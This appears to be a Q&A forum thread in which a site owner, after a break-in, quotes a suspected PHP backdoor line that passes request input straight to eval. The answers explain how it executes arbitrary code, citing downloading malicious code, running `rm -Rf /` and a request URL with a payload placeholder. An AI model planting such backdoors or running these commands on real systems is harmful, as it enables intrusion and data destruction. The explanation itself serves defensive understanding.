-1

Recently we've been shelled by someone who I am not aware of. I've checked all the logs and the only thing I could find was a file from a plugin that could possibly have the flaw, after he POSTed to this URL, he had access to the uploaded file, which indeed was a shell.

I am suspecting that this line of code is causing the issue.

(isset($_REQUEST['null']) ? @eval($_REQUEST['null']) : null);

Could anyone explain to me how someone would shell through this? I'm really curious how he did it, so I can also spit through the other plugins for bad codes like this. They basicily uploaded a file from this. Maybe file_put_contents() or an actual POST request with an image?

I'm not familiair with hacking, I've also never used eval as I heard that it in fact is an evil function. Also please note that I will NOT use this to hack other sites, I just wanna understand what's going on here.

Jonathan Leffler
  • 730,956
  • 141
  • 904
  • 1,278
Jordy
  • 948
  • 2
  • 9
  • 28

2 Answers2

1

That's a BIG flaw! You can pass a whole PHP script (via POST) and it will be executed on your server.

Picture a PHP code that uses curl (http://php.net/curl) to download any other malicious code into your server.

Or you can just send a rm -Rf / and say goodbye to your filesystem...

vsmoraes
  • 194
  • 2
  • 7
1

By issuing a request like this

http://yourdomain.com/file.php?null=PHP_PAYLOAD

Because of eval, the PHP_PAYLOAD, will be evaluated/executed.

The payload can be anything that's valid php, for example writing new files, downloading them on the server, running shell commands via shell_exec.

any valid php code would be executed.

Alex Andrei
  • 7,315
  • 3
  • 28
  • 42